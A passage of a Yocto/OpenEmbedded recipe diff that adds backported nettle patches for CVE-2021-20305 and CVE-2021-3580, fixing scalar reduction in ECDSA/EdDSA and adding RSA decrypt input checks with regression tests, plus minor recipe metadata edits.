60+ ecc_mod_mul_canonical (&ecc->q, u1, hp, sinv, u1);
61
62 /* u2 = r / s, P2 = u2 * Y */
63- ecc_modq_mul (ecc, u2, rp, sinv);
64+ ecc_mod_mul_canonical (&ecc->q, u2, rp, sinv, u2);
65
66 /* Total storage: 5*ecc->p.size + ecc->mul_itch */
67 ecc->mul (ecc, P2, u2, pp, u2 + ecc->p.size);
68Index: nettle-3.5.1/testsuite/ecdsa-sign-test.c
69===================================================================
70--- nettle-3.5.1.orig/testsuite/ecdsa-sign-test.c
71+++ nettle-3.5.1/testsuite/ecdsa-sign-test.c
72@@ -58,6 +58,19 @@ test_ecdsa (const struct ecc_curve *ecc,
73 void
74 test_main (void)
75 {
76+ /* Producing the signature for corresponding test in
77+ ecdsa-verify-test.c, with special u1 and u2. */
78+ test_ecdsa (&_nettle_secp_224r1,
79+ "99b5b787484def12894ca507058b3bf5"
80+ "43d72d82fa7721d2e805e5e6",
81+ "2",
82+ SHEX("cdb887ac805a3b42e22d224c85482053"
83+ "16c755d4a736bb2032c92553"),
84+ "706a46dc76dcb76798e60e6d89474788"
85+ "d16dc18032d268fd1a704fa6", /* r */
86+ "3a41e1423b1853e8aa89747b1f987364"
87+ "44705d6d6d8371ea1f578f2e"); /* s */
88+
89 /* Test cases for the smaller groups, verified with a
90 proof-of-concept implementation done for Yubico AB. */
91 test_ecdsa (&_nettle_secp_192r1,
92Index: nettle-3.5.1/testsuite/ecdsa-verify-test.c
93===================================================================
94--- nettle-3.5.1.orig/testsuite/ecdsa-verify-test.c
95+++ nettle-3.5.1/testsuite/ecdsa-verify-test.c
96@@ -81,6 +81,26 @@ test_ecdsa (const struct ecc_curve *ecc,
97 void
98 test_main (void)
99 {
100+ /* Corresponds to nonce k = 2 and private key z =
101+ 0x99b5b787484def12894ca507058b3bf543d72d82fa7721d2e805e5e6. z and
102+ hash are chosen so that intermediate scalars in the verify
103+ equations are u1 = 0x6b245680e700, u2 =
104+ 259da6542d4ba7d21ad916c3bd57f811. These values require canonical
105+ reduction of the scalars. Bug caused by missing canonical
106+ reduction reported by Guido Vranken. */
107+ test_ecdsa (&_nettle_secp_224r1,
108+ "9e7e6cc6b1bdfa8ee039b66ad85e5490"
109+ "7be706a900a3cba1c8fdd014", /* x */
110+ "74855db3f7c1b4097ae095745fc915e3"
111+ "8a79d2a1de28f282eafb22ba", /* y */
112+
113+ SHEX("cdb887ac805a3b42e22d224c85482053"
114+ "16c755d4a736bb2032c92553"),
115+ "706a46dc76dcb76798e60e6d89474788"
116+ "d16dc18032d268fd1a704fa6", /* r */
117+ "3a41e1423b1853e8aa89747b1f987364"
118+ "44705d6d6d8371ea1f578f2e"); /* s */
119+
120 /* From RFC 4754 */
121 test_ecdsa (&_nettle_secp_256r1,
122 "2442A5CC 0ECD015F A3CA31DC 8E2BBC70"
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch
new file mode 100644
index 0000000000..54b4fa584c
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch
@@ -0,0 +1,48 @@
1Backport of:
2
3From 51f643eee00e2caa65c8a2f5857f49acdf3ef1ce Mon Sep 17 00:00:00 2001
4From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
5Date: Sat, 13 Mar 2021 16:27:50 +0100
6Subject: [PATCH] Ensure ecdsa_sign output is canonically reduced.
7
8* ecc-ecdsa-sign.c (ecc_ecdsa_sign): Ensure s output is reduced to
9canonical range.
10
11(cherry picked from commit c24b36160dc5303f7541dd9da1429c4046f27398)
12
13Upstream-Status: Backport
14https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-4.patch
15CVE: CVE-2021-20305 dep4
16Signed-off-by: Armin Kuster <akuster@mvista.com>
17
18---
19 ChangeLog | 3 +++
20 ecc-ecdsa-sign.c | 3 +--
21 2 files changed, 4 insertions(+), 2 deletions(-)
22
23#diff --git a/ChangeLog b/ChangeLog
24#index 63848f53..fb2d7f66 100644
25#--- a/ChangeLog
26#+++ b/ChangeLog
27#@@ -1,5 +1,8 @@
28# 2021-03-13 Niels Möller <nisse@lysator.liu.se>
29#
30#+ * ecc-ecdsa-sign.c (ecc_ecdsa_sign): Ensure s output is reduced to
31#+ canonical range.
32#+
33# * ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical
34# to compute the scalars used for ecc multiplication.
35# * testsuite/ecdsa-verify-test.c (test_main): Add test case that
36--- a/ecc-ecdsa-sign.c
37+++ b/ecc-ecdsa-sign.c
38@@ -90,9 +90,8 @@ ecc_ecdsa_sign (const struct ecc_curve *
39
40 ecc_modq_mul (ecc, tp, zp, rp);
41 ecc_modq_add (ecc, hp, hp, tp);
42- ecc_modq_mul (ecc, tp, hp, kinv);
43+ ecc_mod_mul_canonical (&ecc->q, sp, hp, kinv, tp);
44
45- mpn_copyi (sp, tp, ecc->p.size);
46 #undef P
47 #undef hp
48 #undef kinv
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch
new file mode 100644
index 0000000000..468ff66266
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch
@@ -0,0 +1,53 @@
1Backport of:
2
3From ae3801a0e5cce276c270973214385c86048d5f7b Mon Sep 17 00:00:00 2001
4From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
5Date: Sat, 13 Mar 2021 16:42:21 +0100
6Subject: [PATCH] Similar fix for eddsa.
7
8* eddsa-hash.c (_eddsa_hash): Ensure result is canonically
9reduced. Two of the three call sites need that.
10
11(cherry picked from commit d9b564e4b3b3a5691afb9328c7342b3f7ca64288)
12
13
14Upstream-Status: Backport
15https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-6.patch
16CVE: CVE-2021-20305
17Signed-off-by: Armin Kuster <akuster@mvista.com>
18
19---
20 ChangeLog | 3 +++
21 eddsa-hash.c | 10 +++++++---
22 2 files changed, 10 insertions(+), 3 deletions(-)
23
24#diff --git a/ChangeLog b/ChangeLog
25#index 5f8a22c2..ce330831 100644
26#--- a/ChangeLog
27#+++ b/ChangeLog
28#@@ -1,5 +1,8 @@
29# 2021-03-13 Niels Möller <nisse@lysator.liu.se>
30#
31#+ * eddsa-hash.c (_eddsa_hash): Ensure result is canonically
32#+ reduced. Two of the three call sites need that.
33#+
34# * ecc-gostdsa-verify.c (ecc_gostdsa_verify): Use ecc_mod_mul_canonical
35# to compute the scalars used for ecc multiplication.
36#
37Index: nettle-3.5.1/eddsa-hash.c
38===================================================================
39--- nettle-3.5.1.orig/eddsa-hash.c
40+++ nettle-3.5.1/eddsa-hash.c
41@@ -46,7 +46,12 @@ void
42 _eddsa_hash (const struct ecc_modulo *m,
43 mp_limb_t *rp, const uint8_t *digest)
44 {
45+ mp_limb_t cy;
46 size_t nbytes = 1 + m->bit_size / 8;
47 mpn_set_base256_le (rp, 2*m->size, digest, 2*nbytes);
48 m->mod (m, rp);
49+ mpn_copyi (rp + m->size, rp, m->size);
50+ /* Ensure canonical reduction. */
51+ cy = mpn_sub_n (rp, rp + m->size, m->m, m->size);
52+ cnd_copy (cy, rp, rp + m->size, m->size);
53 }
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch
new file mode 100644
index 0000000000..ac3a638e72
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch
@@ -0,0 +1,277 @@
1From cd6059aebdd3059fbcf674dddb850b821c13b6c2 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
3Date: Tue, 8 Jun 2021 21:31:39 +0200
4Subject: [PATCH 1/2] Change _rsa_sec_compute_root_tr to take a fix input size.
5
6Improves consistency with _rsa_sec_compute_root, and fixes zero-input bug.
7
8(cherry picked from commit 485b5e2820a057e873b1ba812fdb39cae4adf98c)
9
10Upstream-Status: Backport
11CVE: CVE-2021-3580 dep#1
12Signed-off-by: Armin Kuster <akuster@mvista.com>
13
14---
15 ChangeLog | 17 +++++++++-
16 rsa-decrypt-tr.c | 7 ++---
17 rsa-internal.h | 4 +--
18 rsa-sec-decrypt.c | 9 ++++--
19 rsa-sign-tr.c | 61 +++++++++++++++++-------------------
20 testsuite/rsa-encrypt-test.c | 14 ++++++++-
21 6 files changed, 69 insertions(+), 43 deletions(-)
22
23Index: nettle-3.5.1/rsa-decrypt-tr.c
24===================================================================
25--- nettle-3.5.1.orig/rsa-decrypt-tr.c
26+++ nettle-3.5.1/rsa-decrypt-tr.c
27@@ -52,14 +52,13 @@ rsa_decrypt_tr(const struct rsa_public_k
28 mp_size_t key_limb_size;
29 int res;
30
31- key_limb_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size);
32+ key_limb_size = mpz_size(pub->n);
33
34 TMP_GMP_ALLOC (m, key_limb_size);
35 TMP_GMP_ALLOC (em, key->size);
36+ mpz_limbs_copy(m, gibberish, key_limb_size);
37
38- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m,
39- mpz_limbs_read(gibberish),
40- mpz_size(gibberish));
41+ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, m);
42
43 mpn_get_base256 (em, key->size, m, key_limb_size);
44
45Index: nettle-3.5.1/rsa-internal.h
46===================================================================
47--- nettle-3.5.1.orig/rsa-internal.h
48+++ nettle-3.5.1/rsa-internal.h
49@@ -78,11 +78,11 @@ _rsa_sec_compute_root(const struct rsa_p
50 mp_limb_t *scratch);
51
52 /* Safe side-channel silent variant, using RSA blinding, and checking the
53- * result after CRT. */
54+ * result after CRT. In-place calls, with x == m, is allowed. */
55 int
56 _rsa_sec_compute_root_tr(const struct rsa_public_key *pub,
57 const struct rsa_private_key *key,
58 void *random_ctx, nettle_random_func *random,
59- mp_limb_t *x, const mp_limb_t *m, size_t mn);
60+ mp_limb_t *x, const mp_limb_t *m);
61
62 #endif /* NETTLE_RSA_INTERNAL_H_INCLUDED */
63Index: nettle-3.5.1/rsa-sec-decrypt.c
64===================================================================
65--- nettle-3.5.1.orig/rsa-sec-decrypt.c
66+++ nettle-3.5.1/rsa-sec-decrypt.c
67@@ -58,9 +58,12 @@ rsa_sec_decrypt(const struct rsa_public_
68 TMP_GMP_ALLOC (m, mpz_size(pub->n));
69 TMP_GMP_ALLOC (em, key->size);
70
71- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m,
72- mpz_limbs_read(gibberish),
73- mpz_size(gibberish));
74+ /* We need a copy because m can be shorter than key_size,
75+ * but _rsa_sec_compute_root_tr expect all inputs to be
76+ * normalized to a key_size long buffer length */
77+ mpz_limbs_copy(m, gibberish, mpz_size(pub->n));
78+
79+ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, m);
80
81 mpn_get_base256 (em, key->size, m, mpz_size(pub->n));
82
83Index: nettle-3.5.1/rsa-sign-tr.c
84===================================================================
85--- nettle-3.5.1.orig/rsa-sign-tr.c
86+++ nettle-3.5.1/rsa-sign-tr.c
87@@ -131,35 +131,34 @@ int
88 _rsa_sec_compute_root_tr(const struct rsa_public_key *pub,
89 const struct rsa_private_key *key,
90 void *random_ctx, nettle_random_func *random,
91- mp_limb_t *x, const mp_limb_t *m, size_t mn)
92+ mp_limb_t *x, const mp_limb_t *m)
93 {
94+ mp_size_t nn;
95 mpz_t mz;
96 mpz_t xz;
97 int res;
98
99- mpz_init(mz);
100 mpz_init(xz);
101
102- mpn_copyi(mpz_limbs_write(mz, mn), m, mn);
103- mpz_limbs_finish(mz, mn);
104+ nn = mpz_size (pub->n);
105
106- res = rsa_compute_root_tr(pub, key, random_ctx, random, xz, mz);
107+ res = rsa_compute_root_tr(pub, key, random_ctx, random, xz,
108+ mpz_roinit_n(mz, m, nn));
109
110 if (res)
111- mpz_limbs_copy(x, xz, mpz_size(pub->n));
112+ mpz_limbs_copy(x, xz, nn);
113
114- mpz_clear(mz);
115 mpz_clear(xz);
116 return res;
117 }
118 #else
119 /* Blinds m, by computing c = m r^e (mod n), for a random r. Also
120- returns the inverse (ri), for use by rsa_unblind. */
121+ returns the inverse (ri), for use by rsa_unblind. Must have c != m,
122+ no in-place operation.*/
123 static void
124 rsa_sec_blind (const struct rsa_public_key *pub,
125 void *random_ctx, nettle_random_func *random,
126- mp_limb_t *c, mp_limb_t *ri, const mp_limb_t *m,
127- mp_size_t mn)
128+ mp_limb_t *c, mp_limb_t *ri, const mp_limb_t *m)
129 {
130 const mp_limb_t *ep = mpz_limbs_read (pub->e);
131 const mp_limb_t *np = mpz_limbs_read (pub->n);
132@@ -177,15 +176,15 @@ rsa_sec_blind (const struct rsa_public_k
133
134 /* c = m*(r^e) mod n */
135 itch = mpn_sec_powm_itch(nn, ebn, nn);
136- i2 = mpn_sec_mul_itch(nn, mn);
137+ i2 = mpn_sec_mul_itch(nn, nn);
138 itch = MAX(itch, i2);
139- i2 = mpn_sec_div_r_itch(nn + mn, nn);
140+ i2 = mpn_sec_div_r_itch(2*nn, nn);
141 itch = MAX(itch, i2);
142 i2 = mpn_sec_invert_itch(nn);
143 itch = MAX(itch, i2);
144
145- TMP_GMP_ALLOC (tp, nn + mn + itch);
146- scratch = tp + nn + mn;
147+ TMP_GMP_ALLOC (tp, 2*nn + itch);
148+ scratch = tp + 2*nn;
149
150 /* ri = r^(-1) */
151 do
152@@ -198,9 +197,8 @@ rsa_sec_blind (const struct rsa_public_k
153 while (!mpn_sec_invert (ri, tp, np, nn, 2 * nn * GMP_NUMB_BITS, scratch));
154
155 mpn_sec_powm (c, rp, nn, ep, ebn, np, nn, scratch);
156- /* normally mn == nn, but m can be smaller in some cases */
157- mpn_sec_mul (tp, c, nn, m, mn, scratch);
158- mpn_sec_div_r (tp, nn + mn, np, nn, scratch);
159+ mpn_sec_mul (tp, c, nn, m, nn, scratch);
160+ mpn_sec_div_r (tp, 2*nn, np, nn, scratch);
161 mpn_copyi(c, tp, nn);
162
163 TMP_GMP_FREE (r);
164@@ -208,7 +206,7 @@ rsa_sec_blind (const struct rsa_public_k
165 TMP_GMP_FREE (tp);
166 }
167
168-/* m = c ri mod n */
169+/* m = c ri mod n. Allows x == c. */
170 static void
171 rsa_sec_unblind (const struct rsa_public_key *pub,
172 mp_limb_t *x, mp_limb_t *ri, const mp_limb_t *c)
173@@ -299,7 +297,7 @@ int
174 _rsa_sec_compute_root_tr(const struct rsa_public_key *pub,
175 const struct rsa_private_key *key,
176 void *random_ctx, nettle_random_func *random,
177- mp_limb_t *x, const mp_limb_t *m, size_t mn)
178+ mp_limb_t *x, const mp_limb_t *m)
179 {
180 TMP_GMP_DECL (c, mp_limb_t);
181 TMP_GMP_DECL (ri, mp_limb_t);
182@@ -307,7 +305,7 @@ _rsa_sec_compute_root_tr(const struct rs
183 size_t key_limb_size;
184 int ret;
185
186- key_limb_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size);
187+ key_limb_size = mpz_size(pub->n);
188
189 /* mpz_powm_sec handles only odd moduli. If p, q or n is even, the
190 key is invalid and rejected by rsa_private_key_prepare. However,
191@@ -321,19 +319,18 @@ _rsa_sec_compute_root_tr(const struct rs
192 }
193
194 assert(mpz_size(pub->n) == key_limb_size);
195- assert(mn <= key_limb_size);
196
197 TMP_GMP_ALLOC (c, key_limb_size);
198 TMP_GMP_ALLOC (ri, key_limb_size);
199 TMP_GMP_ALLOC (scratch, _rsa_sec_compute_root_itch(key));
200
201- rsa_sec_blind (pub, random_ctx, random, x, ri, m, mn);
202+ rsa_sec_blind (pub, random_ctx, random, c, ri, m);
203
204- _rsa_sec_compute_root(key, c, x, scratch);
205+ _rsa_sec_compute_root(key, x, c, scratch);
206
207- ret = rsa_sec_check_root(pub, c, x);
208+ ret = rsa_sec_check_root(pub, x, c);
209
210- rsa_sec_unblind(pub, x, ri, c);
211+ rsa_sec_unblind(pub, x, ri, x);
212
213 cnd_mpn_zero(1 - ret, x, key_limb_size);
214
215@@ -357,17 +354,17 @@ rsa_compute_root_tr(const struct rsa_pub
216 mpz_t x, const mpz_t m)
217 {
218 TMP_GMP_DECL (l, mp_limb_t);
219+ mp_size_t nn = mpz_size(pub->n);
220 int res;
221
222- mp_size_t l_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size);
223- TMP_GMP_ALLOC (l, l_size);
224+ TMP_GMP_ALLOC (l, nn);
225+ mpz_limbs_copy(l, m, nn);
226
227- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, l,
228- mpz_limbs_read(m), mpz_size(m));
229+ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, l, l);
230 if (res) {
231- mp_limb_t *xp = mpz_limbs_write (x, l_size);
232- mpn_copyi (xp, l, l_size);
233- mpz_limbs_finish (x, l_size);
234+ mp_limb_t *xp = mpz_limbs_write (x, nn);
235+ mpn_copyi (xp, l, nn);
236+ mpz_limbs_finish (x, nn);
237 }
238
239 TMP_GMP_FREE (l);
240Index: nettle-3.5.1/testsuite/rsa-encrypt-test.c
241===================================================================
242--- nettle-3.5.1.orig/testsuite/rsa-encrypt-test.c
243+++ nettle-3.5.1/testsuite/rsa-encrypt-test.c
244@@ -19,6 +19,7 @@ test_main(void)
245 uint8_t after;
246
247 mpz_t gibberish;
248+ mpz_t zero;
249
250 rsa_private_key_init(&key);
251 rsa_public_key_init(&pub);
252@@ -101,6 +102,17 @@ test_main(void)
253 ASSERT(decrypted[decrypted_length] == after);
254 ASSERT(decrypted[0] == 'A');
255
256+ /* Test zero input. */
257+ mpz_init_set_ui (zero, 0);
258+ decrypted_length = msg_length;
259+ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, zero));
260+ ASSERT(!rsa_decrypt_tr(&pub, &key,
261+ &lfib, (nettle_random_func *) knuth_lfib_random,
262+ &decrypted_length, decrypted, zero));
263+ ASSERT(!rsa_sec_decrypt(&pub, &key,
264+ &lfib, (nettle_random_func *) knuth_lfib_random,
265+ decrypted_length, decrypted, zero));
266+ ASSERT(decrypted_length == msg_length);
267
268 /* Test invalid key. */
269 mpz_add_ui (key.q, key.q, 2);
270@@ -112,6 +124,6 @@ test_main(void)
271 rsa_private_key_clear(&key);
272 rsa_public_key_clear(&pub);
273 mpz_clear(gibberish);
274+ mpz_clear(zero);
275 free(decrypted);
276 }
277-
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch
new file mode 100644
index 0000000000..18e952ddf7
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch
@@ -0,0 +1,163 @@
1From c80961c646b0962ab152619ac0a7c6a21850a380 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
3Date: Tue, 8 Jun 2021 21:32:38 +0200
4Subject: [PATCH 2/2] Add input check to rsa_decrypt family of functions.
5
6(cherry picked from commit 0ad0b5df315665250dfdaa4a1e087f4799edaefe)
7
8Upstream-Status: Backport
9CVE: CVE-2021-3580
10Signed-off-by: Armin Kuster <akuster@mvista.com>
11
12---
13 ChangeLog | 10 +++++++++-
14 rsa-decrypt-tr.c | 4 ++++
15 rsa-decrypt.c | 10 ++++++++++
16 rsa-sec-decrypt.c | 4 ++++
17 rsa.h | 5 +++--
18 testsuite/rsa-encrypt-test.c | 38 ++++++++++++++++++++++++++++++------
19 6 files changed, 62 insertions(+), 9 deletions(-)
20
21Index: nettle-3.5.1/rsa-decrypt-tr.c
22===================================================================
23--- nettle-3.5.1.orig/rsa-decrypt-tr.c
24+++ nettle-3.5.1/rsa-decrypt-tr.c
25@@ -52,6 +52,10 @@ rsa_decrypt_tr(const struct rsa_public_k
26 mp_size_t key_limb_size;
27 int res;
28
29+ /* First check that input is in range. */
30+ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, pub->n) >= 0)
31+ return 0;
32+
33 key_limb_size = mpz_size(pub->n);
34
35 TMP_GMP_ALLOC (m, key_limb_size);
36Index: nettle-3.5.1/rsa-decrypt.c
37===================================================================
38--- nettle-3.5.1.orig/rsa-decrypt.c
39+++ nettle-3.5.1/rsa-decrypt.c
40@@ -48,6 +48,16 @@ rsa_decrypt(const struct rsa_private_key
41 int res;
42
43 mpz_init(m);
44+
45+ /* First check that input is in range. Since we don't have the
46+ public key available here, we need to reconstruct n. */
47+ mpz_mul (m, key->p, key->q);
48+ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, m) >= 0)
49+ {
50+ mpz_clear (m);
51+ return 0;
52+ }
53+
54 rsa_compute_root(key, m, gibberish);
55
56 res = pkcs1_decrypt (key->size, m, length, message);
57Index: nettle-3.5.1/rsa-sec-decrypt.c
58===================================================================
59--- nettle-3.5.1.orig/rsa-sec-decrypt.c
60+++ nettle-3.5.1/rsa-sec-decrypt.c
61@@ -55,6 +55,10 @@ rsa_sec_decrypt(const struct rsa_public_
62 TMP_GMP_DECL (em, uint8_t);
63 int res;
64
65+ /* First check that input is in range. */
66+ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, pub->n) >= 0)
67+ return 0;
68+
69 TMP_GMP_ALLOC (m, mpz_size(pub->n));
70 TMP_GMP_ALLOC (em, key->size);
71
72Index: nettle-3.5.1/rsa.h
73===================================================================
74--- nettle-3.5.1.orig/rsa.h
75+++ nettle-3.5.1/rsa.h
76@@ -428,13 +428,14 @@ rsa_sec_decrypt(const struct rsa_public_
77 size_t length, uint8_t *message,
78 const mpz_t gibberish);
79
80-/* Compute x, the e:th root of m. Calling it with x == m is allowed. */
81+/* Compute x, the e:th root of m. Calling it with x == m is allowed.
82+ It is required that 0 <= m < n. */
83 void
84 rsa_compute_root(const struct rsa_private_key *key,
85 mpz_t x, const mpz_t m);
86
87 /* Safer variant, using RSA blinding, and checking the result after
88- CRT. */
89+ CRT. It is required that 0 <= m < n. */
90 int
91 rsa_compute_root_tr(const struct rsa_public_key *pub,
92 const struct rsa_private_key *key,
93Index: nettle-3.5.1/testsuite/rsa-encrypt-test.c
94===================================================================
95--- nettle-3.5.1.orig/testsuite/rsa-encrypt-test.c
96+++ nettle-3.5.1/testsuite/rsa-encrypt-test.c
97@@ -19,11 +19,12 @@ test_main(void)
98 uint8_t after;
99
100 mpz_t gibberish;
101- mpz_t zero;
102+ mpz_t bad_input;
103
104 rsa_private_key_init(&key);
105 rsa_public_key_init(&pub);
106 mpz_init(gibberish);
107+ mpz_init(bad_input);
108
109 knuth_lfib_init(&lfib, 17);
110
111@@ -103,15 +104,40 @@ test_main(void)
112 ASSERT(decrypted[0] == 'A');
113
114 /* Test zero input. */
115- mpz_init_set_ui (zero, 0);
116+ mpz_set_ui (bad_input, 0);
117 decrypted_length = msg_length;
118- ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, zero));
119+ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input));
120 ASSERT(!rsa_decrypt_tr(&pub, &key,
121 &lfib, (nettle_random_func *) knuth_lfib_random,
122- &decrypted_length, decrypted, zero));
123+ &decrypted_length, decrypted, bad_input));
124 ASSERT(!rsa_sec_decrypt(&pub, &key,
125 &lfib, (nettle_random_func *) knuth_lfib_random,
126- decrypted_length, decrypted, zero));
127+ decrypted_length, decrypted, bad_input));
128+ ASSERT(decrypted_length == msg_length);
129+
130+ /* Test input that is slightly larger than n */
131+ mpz_add(bad_input, gibberish, pub.n);
132+ decrypted_length = msg_length;
133+ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input));
134+ ASSERT(!rsa_decrypt_tr(&pub, &key,
135+ &lfib, (nettle_random_func *) knuth_lfib_random,
136+ &decrypted_length, decrypted, bad_input));
137+ ASSERT(!rsa_sec_decrypt(&pub, &key,
138+ &lfib, (nettle_random_func *) knuth_lfib_random,
139+ decrypted_length, decrypted, bad_input));
140+ ASSERT(decrypted_length == msg_length);
141+
142+ /* Test input that is considerably larger than n */
143+ mpz_mul_2exp (bad_input, pub.n, 100);
144+ mpz_add (bad_input, bad_input, gibberish);
145+ decrypted_length = msg_length;
146+ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input));
147+ ASSERT(!rsa_decrypt_tr(&pub, &key,
148+ &lfib, (nettle_random_func *) knuth_lfib_random,
149+ &decrypted_length, decrypted, bad_input));
150+ ASSERT(!rsa_sec_decrypt(&pub, &key,
151+ &lfib, (nettle_random_func *) knuth_lfib_random,
152+ decrypted_length, decrypted, bad_input));
153 ASSERT(decrypted_length == msg_length);
154
155 /* Test invalid key. */
156@@ -124,6 +150,6 @@ test_main(void)
157 rsa_private_key_clear(&key);
158 rsa_public_key_clear(&pub);
159 mpz_clear(gibberish);
160- mpz_clear(zero);
161+ mpz_clear(bad_input);
162 free(decrypted);
163 }
diff --git a/meta/recipes-support/nettle/nettle_3.5.1.bb b/meta/recipes-support/nettle/nettle_3.5.1.bb
index a9550ed033..192fd295e9 100644
--- a/meta/recipes-support/nettle/nettle_3.5.1.bb
+++ b/meta/recipes-support/nettle/nettle_3.5.1.bb
@@ -1,4 +1,5 @@
1SUMMARY = "A low level cryptographic library" 1SUMMARY = "A low level cryptographic library"
2DESCRIPTION = "Nettle is a cryptographic library that is designed to fit easily in more or less any context: In crypto toolkits for object-oriented languages (C++, Python, Pike, ...), in applications like LSH or GNUPG, or even in kernel space."
2HOMEPAGE = "http://www.lysator.liu.se/~nisse/nettle/" 3HOMEPAGE = "http://www.lysator.liu.se/~nisse/nettle/"
3DESCRIPTION = "It tries to solve a problem of providing a common set of \ 4DESCRIPTION = "It tries to solve a problem of providing a common set of \
4cryptographic algorithms for higher-level applications by implementing a \ 5cryptographic algorithms for higher-level applications by implementing a \
@@ -17,6 +18,13 @@ SRC_URI = "${GNU_MIRROR}/${BPN}/${BP}.tar.gz \
17 file://Add-target-to-only-build-tests-not-run-them.patch \ 18 file://Add-target-to-only-build-tests-not-run-them.patch \
18 file://run-ptest \ 19 file://run-ptest \
19 file://check-header-files-of-openssl-only-if-enable_.patch \ 20 file://check-header-files-of-openssl-only-if-enable_.patch \
21 file://CVE-2021-3580_1.patch \
22 file://CVE-2021-3580_2.patch \
23 file://CVE-2021-20305-1.patch \
24 file://CVE-2021-20305-2.patch \
25 file://CVE-2021-20305-3.patch \
26 file://CVE-2021-20305-4.patch \
27 file://CVE-2021-20305-5.patch \
20 " 28 "
21 29
22SRC_URI_append_class-target = "\ 30SRC_URI_append_class-target = "\
diff --git a/meta/recipes-support/npth/npth_1.6.bb b/meta/recipes-support/npth/npth_1.6.bb
index 88484acec3..94a3f00eac 100644
--- a/meta/recipes-support/npth/npth_1.6.bb
+++ b/meta/recipes-support/npth/npth_1.6.bb
@@ -1,4 +1,5 @@
1SUMMARY = "New GNU Portable Threads library" 1SUMMARY = "New GNU Portable Threads library"
2DESCRIPTION = "nPth is a library to provide the GNU Pth API and thus a non-preemptive threads implementation. "
2HOMEPAGE = "https://www.gnu.org/software/pth/" 3HOMEPAGE = "https://www.gnu.org/software/pth/"
3SECTION = "libs" 4SECTION = "libs"
4LICENSE = "LGPLv2+" 5LICENSE = "LGPLv2+"
diff --git a/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb b/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb
index c539ecdbc6..5f1b73ee16 100644
--- a/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb
+++ b/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb
@@ -1,4 +1,6 @@
1SUMMARY = "Provides a way to load and enumerate PKCS#11 modules" 1SUMMARY = "Provides a way to load and enumerate PKCS#11 modules"
2DESCRIPTION = " Provides a standard configuration setup for installing PKCS#11 modules in such a way that they're discoverable. Also solves problems with coordinating the use of PKCS#11 by different components or libraries living in the same process."
3HOMEPAGE = "https://p11-glue.github.io/p11-glue/p11-kit.html"
2LICENSE = "BSD-3-Clause" 4LICENSE = "BSD-3-Clause"
3LIC_FILES_CHKSUM = "file://COPYING;md5=02933887f609807fbb57aa4237d14a50" 5LIC_FILES_CHKSUM = "file://COPYING;md5=02933887f609807fbb57aa4237d14a50"
4 6
@@ -8,7 +10,7 @@ DEPENDS = "libtasn1 libtasn1-native libffi"
8 10
9DEPENDS_append = "${@' glib-2.0' if d.getVar('GTKDOC_ENABLED') == 'True' else ''}" 11DEPENDS_append = "${@' glib-2.0' if d.getVar('GTKDOC_ENABLED') == 'True' else ''}"
10 12
11SRC_URI = "git://github.com/p11-glue/p11-kit;branch=0.23" 13SRC_URI = "git://github.com/p11-glue/p11-kit;branch=0.23;protocol=https"
12SRCREV = "bd97afbfe28d5fbbde95ce36ff7a8834fc0291ee" 14SRCREV = "bd97afbfe28d5fbbde95ce36ff7a8834fc0291ee"
13S = "${WORKDIR}/git" 15S = "${WORKDIR}/git"
14 16
diff --git a/meta/recipes-support/popt/popt_1.16.bb b/meta/recipes-support/popt/popt_1.16.bb
index 27e49c2ca2..0c0392d036 100644
--- a/meta/recipes-support/popt/popt_1.16.bb
+++ b/meta/recipes-support/popt/popt_1.16.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Library for parsing command line options" 1SUMMARY = "Library for parsing command line options"
